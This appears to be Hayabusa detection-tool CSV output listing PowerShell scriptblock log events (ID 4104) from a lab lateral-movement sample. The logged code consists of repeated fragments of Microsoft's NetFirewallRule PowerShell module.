[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssoci",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"atedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${Associ",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"atedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${Associ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"atedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallRule' -Alias '*' function Set-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Owner}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] 